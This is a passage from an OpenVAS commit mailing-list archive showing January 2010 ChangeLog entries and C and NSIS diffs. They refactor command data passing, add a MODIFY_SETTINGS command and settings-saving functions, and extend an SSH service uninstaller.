trunk/openvas-administrator/ChangeLog 2010-01-14 11:06:50 UTC (rev 6408) +++ trunk/openvas-administrator/ChangeLog 2010-01-14 14:48:13 UTC (rev 6409) @@ -1,5 +1,17 @@ 2010-01-14 Matthew Mundell + Initiate switch to more manageable data passing mechanism. + + * src/oap.c (get_users_data_t, command_data_t): New types. + (get_users_data_reset, command_data_init): New function. + (current_int_1, current_int_2): Remove. + (command_data, get_users_data): New variables. + (oap_xml_handle_start_element, oap_xml_handle_end_element): Use new + data passing mechanism for GET_USERS. + (init_oap): Neaten doc. Init command_data. + +2010-01-14 Matthew Mundell + * src/oap.c: Order cases and branches alphabetically. (help_text): Sort. Bring width within 80 chars. Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-14 11:06:50 UTC (rev 6408) +++ trunk/openvas-administrator/src/oap.c 2010-01-14 14:48:13 UTC (rev 6409) @@ -302,17 +302,36 @@ #define STATUS_SERVICE_DOWN_TEXT "Service temporarily down" +/* Command data passed between parser callbacks. */ + +typedef struct +{ + int sort_order; +} get_users_data_t; + +static void +get_users_data_reset (get_users_data_t *data) +{ + memset (data, 0, sizeof (get_users_data_t)); +} + +typedef union +{ + get_users_data_t get_users; +} command_data_t; + +static void +command_data_init (command_data_t *data) +{ + memset (data, 0, sizeof (command_data_t)); +} + + /* Global variables. */ -/** - * @brief Generic integer variable for communicating between the callbacks. - */ -int current_int_1; +command_data_t command_data; -/** - * @brief Generic integer variable for communicating between the callbacks. - */ -int current_int_2; +get_users_data_t *get_users_data = &(command_data.get_users); /** * @brief Generic string variable for communicating between the callbacks. @@ -759,9 +778,9 @@ const gchar* attribute; if (find_attribute (attribute_names, attribute_values, "sort_order", &attribute)) - current_int_2 = strcmp (attribute, "descending"); + get_users_data->sort_order = strcmp (attribute, "descending"); else - current_int_2 = 1; + get_users_data->sort_order = 1; set_client_state (CLIENT_GET_USERS); } else if (strcasecmp ("HELP", element_name) == 0) @@ -1151,7 +1170,8 @@ SEND_TO_CLIENT_OR_FAIL (""); - user = users = openvas_admin_list_users (users_dir, current_int_2); + user = users = openvas_admin_list_users (users_dir, + get_users_data->sort_order); while (user) { SENDF_TO_CLIENT_OR_FAIL ("" @@ -1165,6 +1185,7 @@ user = g_slist_next (user); } g_slist_free (users); + get_users_data_reset (get_users_data); SEND_TO_CLIENT_OR_FAIL (""); set_client_state (CLIENT_AUTHENTIC); break; @@ -1280,11 +1301,11 @@ /** * @brief Initialise OAP library. * - * @param[in] log_config Logging configuration list. - * @param[in] users_directory Directory containing user info. + * @param[in] log_config Logging configuration list. + * @param[in] users_directory Directory containing user info. * @param[in] synchronization_script The script to use for feed - * synchronization. - * @param[in] configuration_file Scanner Configuration file. + * synchronization. + * @param[in] configuration_file Scanner configuration file. * * @return 0 success, -1 error. */ @@ -1305,6 +1326,7 @@ scanner_config_file = configuration_file; current_credentials.username = NULL; current_credentials.password = NULL; + command_data_init (&command_data); return 0; } From scm-commit at wald.intevation.org Thu Jan 14 16:07:52 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 14 Jan 2010 16:07:52 +0100 (CET) Subject: [Openvas-commits] r6410 - trunk/winslad Message-ID: <20100114150752.12F2286607CC@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-14 16:07:51 +0100 (Thu, 14 Jan 2010) New Revision: 6410 Modified: trunk/winslad/ChangeLog trunk/winslad/winslad.nsi Log: * winslad.nsi: Make sure all sshd components are removed on uninstall as suggested by Thomas Rotter. Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-14 14:48:13 UTC (rev 6409) +++ trunk/winslad/ChangeLog 2010-01-14 15:07:51 UTC (rev 6410) @@ -1,3 +1,8 @@ +2010-01-14 Michael Wiegand + + * winslad.nsi: Make sure all sshd components are removed on uninstall as + suggested by Thomas Rotter. + 2010-01-08 Michael Wiegand * howto-winslad-via-gsa.txt: Fixed typo, improved usage guide. Modified: trunk/winslad/winslad.nsi =================================================================== --- trunk/winslad/winslad.nsi 2010-01-14 14:48:13 UTC (rev 6409) +++ trunk/winslad/winslad.nsi 2010-01-14 15:07:51 UTC (rev 6410) @@ -120,6 +120,8 @@ MessageBox MB_YESNO "Would you like to uninstall the SSH Service now?" IDYES un_ssh_true IDNO un_ssh_false un_ssh_true: DetailPrint "uninstalling CopSSH" + ExecWait "$\"$PROGRAMFILES\ICW\uninstall_ICW_Base.exe$\" /S" + ExecWait "$\"$PROGRAMFILES\ICW\uninstall_ICW_OpenSSHServer.exe$\" /S" ExecWait "$\"$PROGRAMFILES\ICW\uninstall_Copssh.exe$\" /S" UserMgr::DeleteAccount SvcCOPSSH RMDir /r /REBOOTOK "$PROGRAMFILES\ICW" From scm-commit at wald.intevation.org Thu Jan 14 21:18:16 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 14 Jan 2010 21:18:16 +0100 (CET) Subject: [Openvas-commits] r6411 - in trunk/openvas-libraries: . base Message-ID: <20100114201816.5C22B86607C5@pyrosoma.intevation.org> Author: mattm Date: 2010-01-14 21:18:14 +0100 (Thu, 14 Jan 2010) New Revision: 6411 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/base/settings.c trunk/openvas-libraries/base/settings.h Log: Add support for modifying the scanner configuration file. * base/settings.c (settings_init, settings_cleanup, settings_set) (settings_save, init_settings_iterator): New functions. (init_settings_iterator): Move key_file init to settings_init. (cleanup_settings_iterator): Call through to settings cleanup. (settings_iterator_next, settings_iterator_name): Rename iterator param. (settings_iterator_value): Get fields from settings. * base/settings.h: Update headers accordingly. Make header style more standard. (settings_t): New type. (settings_iterator_t): Move file fields to settings_t and include a settings_t. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-14 15:07:51 UTC (rev 6410) +++ trunk/openvas-libraries/ChangeLog 2010-01-14 20:18:14 UTC (rev 6411) @@ -1,3 +1,20 @@ +2010-01-14 Matthew Mundell + + Add support for modifying the scanner configuration file. + + * base/settings.c (settings_init, settings_cleanup, settings_set) + (settings_save, init_settings_iterator): New functions. + (init_settings_iterator): Move key_file init to settings_init. + (cleanup_settings_iterator): Call through to settings cleanup. + (settings_iterator_next, settings_iterator_name): Rename iterator param. + (settings_iterator_value): Get fields from settings. + + * base/settings.h: Update headers accordingly. Make header style more + standard. + (settings_t): New type. + (settings_iterator_t): Move file fields to settings_t and include a + settings_t. + 2010-01-13 Matthew Mundell Switch to using GKeyFile to represent settings. In the process hide Modified: trunk/openvas-libraries/base/settings.c =================================================================== --- trunk/openvas-libraries/base/settings.c 2010-01-14 15:07:51 UTC (rev 6410) +++ trunk/openvas-libraries/base/settings.c 2010-01-14 20:18:14 UTC (rev 6411) @@ -3,10 +3,11 @@ * Description: Implementation of API to handle configuration file management * * Authors: + * Matthew Mundell * Michael Wiegand * * Copyright: - * Copyright (C) 2009 Greenbone Networks GmbH + * Copyright (C) 2010 Greenbone Networks GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2, @@ -39,25 +40,26 @@ /** * @brief Initialise a settings iterator. * - * @param[in] iterator Settings iterator. + * @param[in] settings Settings. * @param[in] filename Complete name of the configuration file. * @param[in] group Name of the group in the file. * * @return 0 success, -1 error. */ int -init_settings_iterator (settings_iterator_t *settings, const char *filename, - const char *group) +settings_init (settings_t *settings, const gchar *filename, const gchar *group) { GError* error = NULL; - gsize keys_length; if (filename == NULL || group == NULL) return -1; settings->key_file = g_key_file_new (); - if (!g_key_file_load_from_file (settings->key_file, filename, G_KEY_FILE_NONE, + if (!g_key_file_load_from_file (settings->key_file, + filename, + G_KEY_FILE_KEEP_COMMENTS + | G_KEY_FILE_KEEP_TRANSLATIONS, &error)) { g_warning ("Failed to load configuration from %s: %s", @@ -68,10 +70,100 @@ return -1; } - settings->keys = g_key_file_get_keys (settings->key_file, group, &keys_length, + settings->group_name = g_strdup (group); + settings->file_name = g_strdup (filename); + + return 0; +} + +/** + * @brief Cleanup a settings structure. + * + * @param[in] iterator Settings iterator. + */ +void +settings_cleanup (settings_t *settings) +{ + g_free (settings->group_name); + g_free (settings->file_name); + g_key_file_free (settings->key_file); +} + +/** + * @brief Set a settings name value pair. + * + * @param[in] settings Settings. + * @param[in] name Name of setting. + * @param[in] value Value of setting. + */ +void +settings_set (settings_t *settings, const gchar *name, const gchar *value) +{ + g_key_file_set_value (settings->key_file, + settings->group_name, + name, + value); +} + +/** + * @brief Save settings. + * + * @param[in] settings Settings. + * + * @return 0 success, -1 error. + */ +int +settings_save (settings_t *settings) +{ + gsize length; + GError *error = NULL; + gchar *data; + + data = g_key_file_to_data (settings->key_file, &length, &error); + if (data == NULL) + { + g_warning ("%s: g_key_file_to_data: %s\n", __FUNCTION__, error->message); + g_error_free (error); + return -1; + } + + if (g_file_set_contents (settings->file_name, data, length, &error)) + { + g_free (data); + return 0; + } + g_warning ("%s: g_file_set_contents: %s\n", __FUNCTION__, error->message); + g_free (data); + g_error_free (error); + return -1; +} + +/** + * @brief Initialise a settings iterator. + * + * @param[in] iterator Settings iterator. + * @param[in] filename Complete name of the configuration file. + * @param[in] group Name of the group in the file. + * + * @return 0 success, -1 error. + */ +int +init_settings_iterator (settings_iterator_t *iterator, const gchar *filename, + const gchar *group) +{ + int ret; + gsize keys_length; + GError *error = NULL; + + ret = settings_init (&iterator->settings, filename, group); + if (ret) return ret; + + iterator->keys = g_key_file_get_keys (iterator->settings.key_file, + group, + &keys_length, &error); - if (settings->keys == NULL) + if (iterator->keys == NULL) { if (error) { @@ -79,13 +171,12 @@ filename, error->message); g_error_free (error); } - g_key_file_free (settings->key_file); + g_key_file_free (iterator->settings.key_file); return -1; } - settings->current_key = settings->keys - 1; - settings->last_key = settings->keys + keys_length - 1; - settings->group_name = g_strdup (group); + iterator->current_key = iterator->keys - 1; + iterator->last_key = iterator->keys + keys_length - 1; return 0; } @@ -96,11 +187,10 @@ * @param[in] iterator Settings iterator. */ void -cleanup_settings_iterator (settings_iterator_t *settings) +cleanup_settings_iterator (settings_iterator_t *iterator) { - g_free (settings->group_name); - g_strfreev (settings->keys); - g_key_file_free (settings->key_file); + g_strfreev (iterator->keys); + settings_cleanup (&iterator->settings); } /** @@ -111,11 +201,11 @@ * @return TRUE if there was a next item, else FALSE. */ gboolean -settings_iterator_next (settings_iterator_t *settings) +settings_iterator_next (settings_iterator_t *iterator) { - if (settings->current_key == settings->last_key) + if (iterator->current_key == iterator->last_key) return FALSE; - settings->current_key++; + iterator->current_key++; return TRUE; } @@ -127,9 +217,9 @@ * @return Name of current key. */ const gchar * -settings_iterator_name (settings_iterator_t *settings) +settings_iterator_name (settings_iterator_t *iterator) { - return *settings->current_key; + return *iterator->current_key; } /** @@ -140,10 +230,10 @@ * @return Value of current key. */ const gchar * -settings_iterator_value (settings_iterator_t *settings) +settings_iterator_value (settings_iterator_t *iterator) { - return g_key_file_get_value (settings->key_file, - settings->group_name, - *settings->current_key, + return g_key_file_get_value (iterator->settings.key_file, + iterator->settings.group_name, + *iterator->current_key, NULL); } Modified: trunk/openvas-libraries/base/settings.h =================================================================== --- trunk/openvas-libraries/base/settings.h 2010-01-14 15:07:51 UTC (rev 6410) +++ trunk/openvas-libraries/base/settings.h 2010-01-14 20:18:14 UTC (rev 6411) @@ -3,10 +3,11 @@ * Description: API (structs and protos) for configuration file management * * Authors: + * Matthew Mundell * Michael Wiegand * * Copyright: - * Copyright (C) 2009 Greenbone Networks GmbH + * Copyright (C) 2010 Greenbone Networks GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2, @@ -37,26 +38,28 @@ typedef struct { + gchar *file_name; gchar *group_name; GKeyFile *key_file; +} settings_t; + +int settings_init (settings_t *, const gchar *, const gchar *); +void settings_cleanup (settings_t *); +void settings_set (settings_t *, const gchar *, const gchar *); +int settings_save (settings_t *); + +typedef struct +{ gchar **keys; + settings_t settings; gchar **current_key; gchar **last_key; } settings_iterator_t; -int -init_settings_iterator (settings_iterator_t *, const char *, const char *); +int init_settings_iterator (settings_iterator_t *, const gchar *, const gchar *); +void cleanup_settings_iterator (settings_iterator_t *); +int settings_iterator_next (settings_iterator_t *); +const gchar *settings_iterator_name (settings_iterator_t *); +const gchar *settings_iterator_value (settings_iterator_t *); -void -cleanup_settings_iterator (settings_iterator_t *); - -int -settings_iterator_next (settings_iterator_t *); - -const gchar * -settings_iterator_name (settings_iterator_t *); - -const gchar * -settings_iterator_value (settings_iterator_t *); - #endif /* not _OPENVAS_LIBRARIES_BASE_SETTINGS_H */ From scm-commit at wald.intevation.org Thu Jan 14 21:37:23 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 14 Jan 2010 21:37:23 +0100 (CET) Subject: [Openvas-commits] r6412 - in trunk/openvas-administrator: . src src/tests Message-ID: <20100114203723.EA22586607C5@pyrosoma.intevation.org> Author: mattm Date: 2010-01-14 21:37:22 +0100 (Thu, 14 Jan 2010) New Revision: 6412 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/admin.c trunk/openvas-administrator/src/admin.h trunk/openvas-administrator/src/oap.c trunk/openvas-administrator/src/oap.h trunk/openvas-administrator/src/oapd.c trunk/openvas-administrator/src/oapd.h trunk/openvas-administrator/src/openvasad.c trunk/openvas-administrator/src/tests/oap_help_0.c Log: Add OMP MODIFY_SETTINGS and option --enable-modify-settings. * src/openvasad.c (main): Add --enable-modify-settings. * src/oapd.c (init_oapd): Add arg enable_modify_settings. * src/oapd.h: Update accordingly. * src/oap.c (array_add, array_terminate, setting_new) (modify_settings_data_reset): New functions. (help_text): Add %s for MODIFY_SETTINGS. (help_modify_settings, enable_modify_settings, modify_settings_data): New variables. (get_users_data_reset, command_data_init, command_data) (get_users_data): Add doc. (modify_settings_data_t): New type. (command_data_t): Add modify_settings. (client_state_t): Add MODIFY_SETTINGS states. (oap_xml_handle_start_element, oap_xml_handle_end_element) (oap_xml_handle_text): Handle MODIFY_SETTINGS. (init_oap): Add param modify_settings. * src/oap.h: Update header accordingly. * src/admin.c (make_array, free_array, openvas_admin_modify_settings): New functions. * src/admin.h: Add headers accordingly. (admin_setting_t): New type. * src/tests/oap_help_0.c (help_text): Indent to match help text. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/ChangeLog 2010-01-14 20:37:22 UTC (rev 6412) @@ -1,5 +1,39 @@ 2010-01-14 Matthew Mundell + Add OMP MODIFY_SETTINGS and option --enable-modify-settings. + + * src/openvasad.c (main): Add --enable-modify-settings. + + * src/oapd.c (init_oapd): Add arg enable_modify_settings. + + * src/oapd.h: Update accordingly. + + * src/oap.c (array_add, array_terminate, setting_new) + (modify_settings_data_reset): New functions. + (help_text): Add %s for MODIFY_SETTINGS. + (help_modify_settings, enable_modify_settings, modify_settings_data): New + variables. + (get_users_data_reset, command_data_init, command_data) + (get_users_data): Add doc. + (modify_settings_data_t): New type. + (command_data_t): Add modify_settings. + (client_state_t): Add MODIFY_SETTINGS states. + (oap_xml_handle_start_element, oap_xml_handle_end_element) + (oap_xml_handle_text): Handle MODIFY_SETTINGS. + (init_oap): Add param modify_settings. + + * src/oap.h: Update header accordingly. + + * src/admin.c (make_array, free_array, openvas_admin_modify_settings): New + functions. + + * src/admin.h: Add headers accordingly. + (admin_setting_t): New type. + + * src/tests/oap_help_0.c (help_text): Indent to match help text. + +2010-01-14 Matthew Mundell + Initiate switch to more manageable data passing mechanism. * src/oap.c (get_users_data_t, command_data_t): New types. Modified: trunk/openvas-administrator/src/admin.c =================================================================== --- trunk/openvas-administrator/src/admin.c 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/src/admin.c 2010-01-14 20:37:22 UTC (rev 6412) @@ -46,6 +46,7 @@ #include #include +#include #include #ifdef S_SPLINT_S @@ -60,7 +61,44 @@ /** @todo Add contention handling at this level. */ + +/* Arrays. */ + /** + * @brief Make a global array. + * + * @return New array. + */ +GPtrArray * +make_array () +{ + return g_ptr_array_new (); +} + +/** + * @brief Free global array value. + * + * Also g_free any elements. + * + * @param[in] array Pointer to array. + */ +void +free_array (GPtrArray *array) +{ + if (array) + { + int index = 0; + gpointer item; + while ((item = g_ptr_array_index (array, index++))) + g_free (item); + g_ptr_array_free (array, TRUE); + } +} + + +/* Everything else. */ + +/** * @brief Convenience function to produce XML output from user list items. * * This function is used by g_slist_foreach(). @@ -966,3 +1004,34 @@ g_free (lockfile_name); return FALSE; } + +/** + * @brief Modify the scanner settings. + * + * @param[in] new_settings New values for settings. + * + * @return 0 success, -1 error. + */ +int +openvas_admin_modify_settings (const char *config_file, const char *group, + const array_t *new_settings /* setting_t */) +{ + if (new_settings) + { + int index = 0; + admin_setting_t *new_setting; + settings_t settings; + + settings_init (&settings, config_file, group); + + while ((new_setting = (admin_setting_t*) g_ptr_array_index (new_settings, + index++))) + settings_set (&settings, new_setting->name, new_setting->value); + + if (settings_save (&settings)) + return -1; + + settings_cleanup (&settings); + } + return 0; +} Modified: trunk/openvas-administrator/src/admin.h =================================================================== --- trunk/openvas-administrator/src/admin.h 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/src/admin.h 2010-01-14 20:37:22 UTC (rev 6412) @@ -28,6 +28,16 @@ #include +typedef struct +{ + gchar *name; + gchar *value; +} admin_setting_t; + +typedef GPtrArray array_t; +array_t *make_array (); +void free_array (array_t *); + GSList *openvas_admin_list_users (const gchar *, int); int openvas_admin_add_user (const gchar *, const gchar *, const gchar *, const gchar *); @@ -43,4 +53,6 @@ GString *print_users_xml (GSList *); GString *print_users_text (GSList *); +int openvas_admin_modify_settings (const char *, const char *, const array_t *); + #endif /* not _OPENVAS_ADMINISTRATOR_ADMIN_H */ Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/src/oap.c 2010-01-14 20:37:22 UTC (rev 6412) @@ -73,6 +73,30 @@ static const gchar *scanner_config_file = NULL; +/* Helper functions. */ + +/** + * @brief Push a generic pointer onto an array. + * + * @param[in] array Array. + * @param[in] pointer Pointer. + */ +static void +array_add (array_t *array, gpointer pointer) +{ + if (array) g_ptr_array_add (array, pointer); +} + +/** + * @brief Terminate an array. + */ +static void +array_terminate (array_t *array) +{ + if (array) g_ptr_array_add (array, NULL); +} + + /* Credentials. */ /** @todo Same as in openvas-manager/src/manage.h. */ @@ -179,17 +203,21 @@ /* Help message. */ static char* help_text = "\n" -" AUTHENTICATE Authenticate with the administrator.\n" -" COMMANDS Run a list of commands.\n" -" CREATE_USER Create a new user.\n" -" DELETE_USER Delete an existing user.\n" -" DESCRIBE_FEED Get details of the NVT feed this administrator uses.\n" -" GET_SETTINGS Get scanner settings.\n" -" GET_USERS Get all users.\n" -" GET_VERSION Get the OpenVAS Administrator Protocol version.\n" -" HELP Get this help text.\n" -" SYNC_FEED Synchronize with an NVT feed.\n"; +" AUTHENTICATE Authenticate with the administrator.\n" +" COMMANDS Run a list of commands.\n" +" CREATE_USER Create a new user.\n" +" DELETE_USER Delete an existing user.\n" +" DESCRIBE_FEED Get details of the NVT feed this administrator uses.\n" +" GET_SETTINGS Get scanner settings.\n" +" GET_USERS Get all users.\n" +" GET_VERSION Get the OpenVAS Administrator Protocol version.\n" +" HELP Get this help text.\n" +"%s" +" SYNC_FEED Synchronize with an NVT feed.\n"; +static char* +help_modify_settings = " MODIFY_SETTINGS Modify the scanner settings.\n"; + /* Status codes. */ @@ -309,17 +337,72 @@ int sort_order; } get_users_data_t; +/** + * @brief Reset GET_USERS data. + */ static void get_users_data_reset (get_users_data_t *data) { memset (data, 0, sizeof (get_users_data_t)); } +/** + * @brief Create a setting. + * + * @param[in] name Name of setting. Free by modify_settings_data_reset. + * @param[in] value Value of setting. Free by modify_settings_data_reset. + * + * @return Freshly allocated setting. + */ +static admin_setting_t * +setting_new (gchar *name, gchar *value) +{ + admin_setting_t *setting = g_malloc (sizeof (admin_setting_t)); + setting->name = name; + setting->value = value; + return setting; +} + +typedef struct +{ + array_t *settings; /* settings_t */ + gchar *setting_name; + gchar *setting_value; +} modify_settings_data_t; + +/** + * @brief Reset MODIFY_SETTINGS data. + */ +static void +modify_settings_data_reset (modify_settings_data_t *data) +{ + if (data->settings) + { + int index = 0; + const admin_setting_t *setting; + + while ((setting = (admin_setting_t*) g_ptr_array_index (data->settings, + index++))) + { + g_free (setting->name); + g_free (setting->value); + } + free_array (data->settings); + } + g_free (data->setting_name); + g_free (data->setting_value); + memset (data, 0, sizeof (modify_settings_data_t)); +} + typedef union { get_users_data_t get_users; + modify_settings_data_t modify_settings; } command_data_t; +/** + * @brief Initialise command data. + */ static void command_data_init (command_data_t *data) { @@ -329,11 +412,27 @@ /* Global variables. */ +/** + * @brief Flag indicating whether MODIFY_SETTINGS command is served. + */ +gboolean enable_modify_settings = FALSE; + +/** + * @brief Parser callback data. + */ command_data_t command_data; +/** + * @brief Parser callback data for GET_USERS. + */ get_users_data_t *get_users_data = &(command_data.get_users); /** + * @brief Parser callback data for MODIFY_SETTINGS. + */ +modify_settings_data_t *modify_settings_data = &(command_data.modify_settings); + +/** * @brief Generic string variable for communicating between the callbacks. */ static /*@null@*/ /*@only@*/ char* @@ -402,6 +501,10 @@ CLIENT_GET_SETTINGS, CLIENT_GET_USERS, CLIENT_HELP, + CLIENT_MODIFY_SETTINGS, + CLIENT_MODIFY_SETTINGS_SETTING, + CLIENT_MODIFY_SETTINGS_SETTING_NAME, + CLIENT_MODIFY_SETTINGS_SETTING_VALUE, CLIENT_SYNC_FEED, CLIENT_VERSION } client_state_t; @@ -789,6 +892,12 @@ set_client_state (CLIENT_GET_SETTINGS); else if (strcasecmp ("GET_VERSION", element_name) == 0) set_client_state (CLIENT_VERSION); + else if (enable_modify_settings + && (strcasecmp ("MODIFY_SETTINGS", element_name) == 0)) + { + modify_settings_data->settings = make_array (); + set_client_state (CLIENT_MODIFY_SETTINGS); + } else if (strcasecmp ("SYNC_FEED", element_name) == 0) set_client_state (CLIENT_SYNC_FEED); else @@ -919,6 +1028,44 @@ } break; + case CLIENT_MODIFY_SETTINGS: + if (strcasecmp ("SETTING", element_name) == 0) + set_client_state (CLIENT_MODIFY_SETTINGS_SETTING); + else + { + if (send_element_error_to_client ("modify_settings", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + + case CLIENT_MODIFY_SETTINGS_SETTING: + if (strcasecmp ("NAME", element_name) == 0) + set_client_state (CLIENT_MODIFY_SETTINGS_SETTING_NAME); + else if (strcasecmp ("VALUE", element_name) == 0) + set_client_state (CLIENT_MODIFY_SETTINGS_SETTING_VALUE); + else + { + if (send_element_error_to_client ("modify_settings", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + default: assert (0); // FIX respond fail to client @@ -1090,7 +1237,10 @@ SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (help_text); + if (enable_modify_settings) + SENDF_TO_CLIENT_OR_FAIL (help_text, help_modify_settings); + else + SENDF_TO_CLIENT_OR_FAIL (help_text, ""); SEND_TO_CLIENT_OR_FAIL (""); set_client_state (CLIENT_AUTHENTIC); break; @@ -1163,6 +1313,48 @@ break; } + case CLIENT_MODIFY_SETTINGS: + { + array_terminate (modify_settings_data->settings); + switch (openvas_admin_modify_settings + (scanner_config_file, + "Misc", + modify_settings_data->settings)) + { + case 0: + SEND_TO_CLIENT_OR_FAIL (XML_OK ("modify_settings")); + break; + default: + assert (0); + case -1: + SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("modify_settings")); + break; + } + modify_settings_data_reset (modify_settings_data); + set_client_state (CLIENT_AUTHENTIC); + break; + } + case CLIENT_MODIFY_SETTINGS_SETTING: + assert (strcasecmp ("SETTING", element_name) == 0); + + array_add (modify_settings_data->settings, + setting_new + (modify_settings_data->setting_name, + modify_settings_data->setting_value)); + + modify_settings_data->setting_name = NULL; + modify_settings_data->setting_value = NULL; + set_client_state (CLIENT_MODIFY_SETTINGS); + break; + case CLIENT_MODIFY_SETTINGS_SETTING_NAME: + assert (strcasecmp ("NAME", element_name) == 0); + set_client_state (CLIENT_MODIFY_SETTINGS_SETTING); + break; + case CLIENT_MODIFY_SETTINGS_SETTING_VALUE: + assert (strcasecmp ("VALUE", element_name) == 0); + set_client_state (CLIENT_MODIFY_SETTINGS_SETTING); + break; + case CLIENT_GET_USERS: { GSList *users, *user; @@ -1267,6 +1459,16 @@ append_to_credentials_password (¤t_credentials, text, text_len); break; + case CLIENT_MODIFY_SETTINGS_SETTING_NAME: + openvas_append_text (&modify_settings_data->setting_name, + text, + text_len); + break; + case CLIENT_MODIFY_SETTINGS_SETTING_VALUE: + openvas_append_text (&modify_settings_data->setting_value, + text, + text_len); + default: /* Just pass over the text. */ break; @@ -1306,13 +1508,15 @@ * @param[in] synchronization_script The script to use for feed * synchronization. * @param[in] configuration_file Scanner configuration file. + * @param[in] modify_settings If true enable OAP MODIFY_SETTINGS. * * @return 0 success, -1 error. */ int init_oap (GSList *log_config, const gchar *users_directory, const gchar *synchronization_script, - const gchar *configuration_file) + const gchar *configuration_file, + gboolean modify_settings) { if (users_directory == NULL) return -1; if (synchronization_script == NULL) return -1; @@ -1327,6 +1531,7 @@ current_credentials.username = NULL; current_credentials.password = NULL; command_data_init (&command_data); + enable_modify_settings = modify_settings; return 0; } Modified: trunk/openvas-administrator/src/oap.h =================================================================== --- trunk/openvas-administrator/src/oap.h 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/src/oap.h 2010-01-14 20:37:22 UTC (rev 6412) @@ -36,7 +36,7 @@ #define TO_CLIENT_BUFFER_SIZE 26214400 int -init_oap (GSList*, const gchar*, const gchar*, const gchar*); +init_oap (GSList*, const gchar*, const gchar*, const gchar*, gboolean); void init_oap_process (); Modified: trunk/openvas-administrator/src/oapd.c =================================================================== --- trunk/openvas-administrator/src/oapd.c 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/src/oapd.c 2010-01-14 20:37:22 UTC (rev 6412) @@ -77,21 +77,23 @@ /** * @brief Initialise the OAP library for the OAP daemon. * - * @param[in] log_config Logging configuration. - * @param[in] users_dir Directory containing user information. + * @param[in] log_config Logging configuration. + * @param[in] users_dir Directory containing user information. * @param[in] synchronization_script The script to use for feed - * synchronization. - * @param[in] configuration_file Configuration file. + * synchronization. + * @param[in] configuration_file Configuration file. + * @param[in] enable_modify_settings If true enable OAP MODIFY_SETTINGS. * * @return 0 success, -1 error, -2 database is wrong version. */ int init_oapd (GSList *log_config, const gchar *users_dir, const gchar *synchronization_script, - const gchar *configuration_file) + const gchar *configuration_file, + gboolean enable_modify_settings) { return init_oap (log_config, users_dir, synchronization_script, - configuration_file); + configuration_file, enable_modify_settings); } /** Modified: trunk/openvas-administrator/src/oapd.h =================================================================== --- trunk/openvas-administrator/src/oapd.h 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/src/oapd.h 2010-01-14 20:37:22 UTC (rev 6412) @@ -30,7 +30,7 @@ #include #include -int init_oapd (GSList*, const gchar*, const gchar*, const gchar*); +int init_oapd (GSList*, const gchar*, const gchar*, const gchar*, gboolean); int serve_oap (gnutls_session_t*, int, gnutls_certificate_credentials_t*); Modified: trunk/openvas-administrator/src/openvasad.c =================================================================== --- trunk/openvas-administrator/src/openvasad.c 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/src/openvasad.c 2010-01-14 20:37:22 UTC (rev 6412) @@ -424,6 +424,7 @@ static gboolean foreground = FALSE; static gboolean print_version = FALSE; + static gboolean enable_modify_settings = FALSE; static gchar *administrator_address_string = NULL; static gchar *administrator_port_string = NULL; static gchar *command = NULL; @@ -476,6 +477,9 @@ { "sync-script", 's', 0, G_OPTION_ARG_FILENAME, &sync_script, "Script to use for NVT feed synchronization", "" }, + { "enable-modify-settings", '\0', 0, G_OPTION_ARG_NONE, + &enable_modify_settings, "Enable the OAP MODIFY_SETTINGS command.", + NULL }, { NULL } }; @@ -861,7 +865,8 @@ /* Initialise OAP daemon. */ - switch (init_oapd (log_config, users_dir, sync_script, scanner_config_file)) + switch (init_oapd (log_config, users_dir, sync_script, scanner_config_file, + enable_modify_settings)) { case 0: break; Modified: trunk/openvas-administrator/src/tests/oap_help_0.c =================================================================== --- trunk/openvas-administrator/src/tests/oap_help_0.c 2010-01-14 20:18:14 UTC (rev 6411) +++ trunk/openvas-administrator/src/tests/oap_help_0.c 2010-01-14 20:37:22 UTC (rev 6412) @@ -33,16 +33,16 @@ #include "../tracef.h" static char* help_text = "\n" -" AUTHENTICATE Authenticate with the administrator.\n" -" COMMANDS Run a list of commands.\n" -" CREATE_USER Create a new user.\n" -" DELETE_USER Delete an existing user.\n" -" DESCRIBE_FEED Get details of the NVT feed this administrator uses.\n" -" GET_SETTINGS Get scanner settings.\n" -" GET_USERS Get all users.\n" -" GET_VERSION Get the OpenVAS Administrator Protocol version.\n" -" HELP Get this help text.\n" -" SYNC_FEED Synchronize with an NVT feed.\n"; +" AUTHENTICATE Authenticate with the administrator.\n" +" COMMANDS Run a list of commands.\n" +" CREATE_USER Create a new user.\n" +" DELETE_USER Delete an existing 